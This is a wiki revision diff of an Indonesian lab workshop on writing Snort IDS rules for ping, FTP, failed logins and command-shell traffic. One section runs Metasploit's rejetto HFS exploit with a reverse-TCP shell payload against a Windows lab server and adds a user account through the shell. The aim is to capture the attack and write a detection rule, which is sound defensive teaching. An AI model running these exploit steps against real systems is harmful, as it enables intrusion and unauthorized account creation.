Difference between revisions of "SNORT-RULES: Contoh Materi Workshop"

From OnnoWiki
Jump to navigation Jump to search
 
(7 intermediate revisions by the same user not shown)
Line 59: Line 59:
 
* classtype:icmp-event – Categorizes the rule as an “icmp-event”, one of the predefined Snort categories. This option helps with rule organization.
 
* classtype:icmp-event – Categorizes the rule as an “icmp-event”, one of the predefined Snort categories. This option helps with rule organization.
  
Jalankan snort configuration test lagi:
+
Test snort untuk cek apakah ada masalah atau tidak, asumsi ethernet enp0s3
  
  sudo snort -T -i eth0 -c /etc/snort/snort.conf
+
  sudo snort -T -i enp0s3 -c /etc/snort/snort.conf
 
 
Jika kita scroll, kita akan melihat ada satu rule tambahan yang sudah di load.
 
  
 
Jalan kan snort dengan mode IDS, tampilkan alert di console:
 
Jalan kan snort dengan mode IDS, tampilkan alert di console:
  
  sudo snort -A console -q -c /etc/snort/snort.conf -i eht0
+
  sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3
  
 
dimana
 
dimana
Line 81: Line 79:
  
 
Maka akan tampak di layar ada alert yang di generate setiap kali ping di terima server.
 
Maka akan tampak di layar ada alert yang di generate setiap kali ping di terima server.
 
  
 
===Deteksi ftp===
 
===Deteksi ftp===
Line 87: Line 84:
 
Untuk belajar lebih lanjut, buat rule tambahan, edit
 
Untuk belajar lebih lanjut, buat rule tambahan, edit
  
  sudo gedit /etc/snort/rules/local.rules
+
  sudo vi /etc/snort/rules/local.rules
  
 
Masukan misalnya,
 
Masukan misalnya,
  
  alert tcp 192.168.x.x any -> $HOME_NET 21 (msg:”FTP connection attempt”; sid:1000002; rev:1;)
+
  alert tcp any any -> $HOME_NET 21 (msg:”FTP connection attempt”; sid:1000002; rev:1;)
  
 
Ini untuk mendeteksi traffic FTP. Jalankan snort
 
Ini untuk mendeteksi traffic FTP. Jalankan snort
  
  sudo snort -A console -q -c /etc/snort/snort.conf -i eth0 -K ascii
+
  sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3 -K ascii
  
Coba ftp dari Kali Linux dengan perintah
+
Coba ftp ke server (misalnya 192.168.x.x) dari Kali Linux dengan perintah
  
 +
apt install ftp
 
  ftp 192.168.x.x
 
  ftp 192.168.x.x
  
 
Maka akan tampak alert.
 
Maka akan tampak alert.
  
Cek log, jalankan
+
Cek log. Cek file TCP:xxxxx-21 (21 adalah port ftp). Misalnya,
  
 
  ls /var/log/snort
 
  ls /var/log/snort
 
Lihat salah satu folder & file misalnya,
 
 
 
  sudo ls /var/log/snort/192.168.x.x
 
  sudo ls /var/log/snort/192.168.x.x
 
  sudo cat /var/log/snort/192.168.x.x/TCP:4561-21
 
  sudo cat /var/log/snort/192.168.x.x/TCP:4561-21
 
File tersebut jika berbentuk bisa baca dengan wireshark
 
  
 
===Detect kegagalan ftp===
 
===Detect kegagalan ftp===
  
 +
Deteksi kegagalan ftp.
 
Edit
 
Edit
  
  sudo gedit /etc/snort/rules/local.rules
+
  sudo vi /etc/snort/rules/local.rules
  
 
Tambahkan
 
Tambahkan
  
  alert tcp $HOME_NET 21 -> any any (msg:”FTP failed login”; content:”Login or password incorrect”; sid:1000003; rev:1;)
+
  alert tcp any any <> $HOME_NET 21 (msg:"FTP failed login"; content:"Login incorrect"; sid:1000003; rev:1;)
  
 
Perhatikan $HOME_NET ada di snort.conf. Jalankan snort,
 
Perhatikan $HOME_NET ada di snort.conf. Jalankan snort,
  
 
+
  sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3
  sudo snort -A console -q -c /etc/snort/snort.conf -i eht0
 
  
 
==Snort sebagai Packet Logger==
 
==Snort sebagai Packet Logger==
Line 163: Line 156:
 
* jika di peroleh packet-nya, lakukan select Follow TCP Stream.
 
* jika di peroleh packet-nya, lakukan select Follow TCP Stream.
  
==Exercise 3: Building a custom rule from logged traffic==
+
==Membuat custom rule dari catatan traffic==
  
We want to see an alert show up anytime Snort sees “C:\Users\Administrator\Desktop\hfs2.3b>.” Go to our local.rules file (if you closed it, open it again as root using the same command as we did earlier), and add the following rule on a new line (note that we are escaping all the backslashes to make sure they are included in the content):
+
Misalnya, kita ingin snort memberikan alert setiap kali melihat “C:\Users\Administrator\Desktop\hfs2.3b>.” Edit local.rules masukan sebagai berikut
  
 
  alert tcp $HOME_NET any -> any any (msg:”Command Shell Access”; content:”C:\\Users\\Administrator\\Desktop\\hfs2.3b”; sid:1000004; rev:1;)
 
  alert tcp $HOME_NET any -> any any (msg:”Command Shell Access”; content:”C:\\Users\\Administrator\\Desktop\\hfs2.3b”; sid:1000004; rev:1;)
  
Save the file. Run Snort in IDS mode again:
+
Jalankan snort sebagai IDS
  
 
  sudo snort -A console -q -c /etc/snort/snort.conf -i eth0
 
  sudo snort -A console -q -c /etc/snort/snort.conf -i eth0
  
Now go back to your Kali Linux VM. You should still be at the prompt for the rejetto exploit. Just enter exploit to run it again. Wait until you get command shell access and return to the Snort terminal on Ubuntu Server. You should see that alerts have been generated based on our new rule:
+
Jalankan exploit tersebut dari Kali Linux maka kita akan melihat alert di server.
 
 
Hit Ctrl+C on Kali Linux terminal and enter y to exit out of the command shell. Then hit Ctrl+C on the Ubuntu Server terminal to stop Snort.
 
 
 
In this case, we have some human-readable content to use in our rule. But that’s not always the case. Let’s modify our rule so it looks for content that is represented in hex format. First, in our local.rules file, copy our latest rule and paste it below in the new line. Now comment out the old rule and change the “rev” value for the new rule to “2.” See below.
 
 
 
Bring up the Wireshark window with our capture again, with the same payload portion selected. Unfortunately, you cannot copy hex values directly from the Wireshark’s main window, but there is an easy solution that will work for us. With the needed content selected, right-click either the corresponding (highlighted) packet in the top pane or the highlighted “Data:” entry in the middle pane and select Copy -> Bytes -> Offset Hex. See below.
 
 
 
Now, in our local.rules file, select the content argument (everything in between the quotation marks) in our new rule, right-click and click Paste. Now carefully remove all extra spaces, line breaks, etc., leaving only the needed hex values. Then put the pipe symbols (|) on both sides. Your finished rule should look like the image below.
 
 
 
Save the file. Start Snort in IDS mode. Next, go to your Kali Linux VM and run the exploit again. Wait until you get the command shell and look at Snort output. You should see alerts generated.
 
 
 
This time we see two alerts instead of four because we included the hex representation of the “>” symbol in the content, making the rule more specific.
 
 
 
Press Ctrl+C to stop Snort. Then, on the Kali Linux VM, press Ctrl+C and enter y to exit out of the command shell and then type in exit to return to the regular prompt.
 
  
This is just some of the basics of the Snort rule writing. Later we will look at some more advanced techniques.
+
Jika kita ingin menyimpan local.rules dari hasil sadapan wireshark di kali linux, kita perlu melakukan,
  
End of Lab
+
* select packet
 +
* di bagian tengah wireshark lakukan Copy > Bytes > Offset Hex.
 +
* paste Hex tersebut di aturan di local.rules, pastikan itu hanya hex yang kita perlukan, tambahan | di ujung2.
  
 
==Referensi==
 
==Referensi==
  
 
* http://resources.infosecinstitute.com/snort-rules-workshop-part-one/
 
* http://resources.infosecinstitute.com/snort-rules-workshop-part-one/

Latest revision as of 03:27, 6 December 2018

Sumber: http://resources.infosecinstitute.com/snort-rules-workshop-part-one/


Install SNORT

  • Buat mesin Ubuntu server
  • Install SNORT
  • Cek versi snort
snort -V

Edit Konfigurasi

  • Tambahkan nilai HOME_NET
vi /etc/snort/snort.conf
  • Tambahkan nilai HOME_NET sesuai dengan jaringan yang akan di monitor, biasanya di akhiri dengan .0/24


Verifikasi SNORT

Jalankan

sudo snort -T -i eth0 -c /etc/snort/snort.conf

Akan keluar misalnya,

0 Snort rules read

Membuat local.rules Sederhana

Deteksi ping

test rule sederhana yang akan dibuat akan menghasilkan alert saat Snort mendeteksi ICMP Echo Request (ping) atau Echo reply message. Buka file local.rules di text editor gunakan perintah berikut,

sudo nano /etc/snort/rules/local.rules

File tersebut kemungkinan besar kosong. Tambahkan kalimat berikut (sebagai satu line, tanpa enter),

alert icmp any any -> $HOME_NET any (msg:”ICMP test”; sid:1000001; rev:1; classtype:icmp-event;)

Mari kita lihat syntax dari rules tersebut,

Rule Header

  • alert – Rule action. Snort will generate an alert when the set condition is met.
  • any – Source IP. Snort will look at all sources.
  • any – Source port. Snort will look at all ports.
  • -> – Direction. From source to destination.
  • $HOME_NET – Destination IP. We are using the HOME_NET value from the snort.conf file.
  • any – Destination port. Snort will look at all ports on the protected network.

Rule Options

  • msg:”ICMP test” – Snort will include this message with the alert.
  • sid:1000001 – Snort rule ID. Remember all numbers < 1,000,000 are reserved, this is why we are starting with 1000001 (you may use any number, as long as it’s greater than 1,000,000).
  • rev:1 – Revision number. This option allows for easier rule maintenance.
  • classtype:icmp-event – Categorizes the rule as an “icmp-event”, one of the predefined Snort categories. This option helps with rule organization.

Test snort untuk cek apakah ada masalah atau tidak, asumsi ethernet enp0s3

sudo snort -T -i enp0s3 -c /etc/snort/snort.conf

Jalan kan snort dengan mode IDS, tampilkan alert di console:

sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3

dimana

-c - memberitahukan file konfigurasi yang digunakan
-i eth0 - memberitahukan interface yang digunakan
-A console - memberitahukan agar alert di tulis di standard output
-q - mode "quiet", tidak print banner dll.

Untuk melihat server tempat snort dijalakan, misalnya

ping 192.168.x.x

Maka akan tampak di layar ada alert yang di generate setiap kali ping di terima server.

Deteksi ftp

Untuk belajar lebih lanjut, buat rule tambahan, edit

sudo vi /etc/snort/rules/local.rules

Masukan misalnya,

alert tcp any any -> $HOME_NET 21 (msg:”FTP connection attempt”; sid:1000002; rev:1;)

Ini untuk mendeteksi traffic FTP. Jalankan snort

sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3 -K ascii

Coba ftp ke server (misalnya 192.168.x.x) dari Kali Linux dengan perintah

apt install ftp
ftp 192.168.x.x

Maka akan tampak alert.

Cek log. Cek file TCP:xxxxx-21 (21 adalah port ftp). Misalnya,

ls /var/log/snort
sudo ls /var/log/snort/192.168.x.x
sudo cat /var/log/snort/192.168.x.x/TCP:4561-21

Detect kegagalan ftp

Deteksi kegagalan ftp. Edit

sudo vi /etc/snort/rules/local.rules

Tambahkan

alert tcp any any <> $HOME_NET 21 (msg:"FTP failed login"; content:"Login incorrect"; sid:1000003; rev:1;)

Perhatikan $HOME_NET ada di snort.conf. Jalankan snort,

sudo snort -A console -q -c /etc/snort/snort.conf -i enp0s3

Snort sebagai Packet Logger

Untuk mendeteksi teknik serangan yang baru, kita bisa menjalankan snort untuk mencatat paket / packet logger menggunakan perintah

sudo snort -dev -q -l /var/log/snort -i eth0

Masuk kali linux untuk menyerang, jalankan,

msfconsole

Lakukan exploit misalnya,

use exploit/windows/http/rejetto_hfs_exec
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.x.x (Kali Linux IP address)
set RHOST 192.168.x.x (Server WIndows IP address)
set RPORT 8081

Jika berhasil maka kita akan memperoleh shell, ketik

net user accountname P@ssword12 /ADD
cd \
mkdir yourname

Ketik Ctrl+C dan jawab y atau "yes" untuk menutup akses shell.

Kemudian,

  • cek /var/log/snort
  • buka menggunakan wireshark, select Edit > Find Packet
  • select Packet Bytes for the Search In criteria.
  • search string, enter the username yang anda buat.
  • jika di peroleh packet-nya, lakukan select Follow TCP Stream.

Membuat custom rule dari catatan traffic

Misalnya, kita ingin snort memberikan alert setiap kali melihat “C:\Users\Administrator\Desktop\hfs2.3b>.” Edit local.rules masukan sebagai berikut

alert tcp $HOME_NET any -> any any (msg:”Command Shell Access”; content:”C:\\Users\\Administrator\\Desktop\\hfs2.3b”; sid:1000004; rev:1;)

Jalankan snort sebagai IDS

sudo snort -A console -q -c /etc/snort/snort.conf -i eth0

Jalankan exploit tersebut dari Kali Linux maka kita akan melihat alert di server.

Jika kita ingin menyimpan local.rules dari hasil sadapan wireshark di kali linux, kita perlu melakukan,

  • select packet
  • di bagian tengah wireshark lakukan Copy > Bytes > Offset Hex.
  • paste Hex tersebut di aturan di local.rules, pastikan itu hanya hex yang kita perlukan, tambahan | di ujung2.

Referensi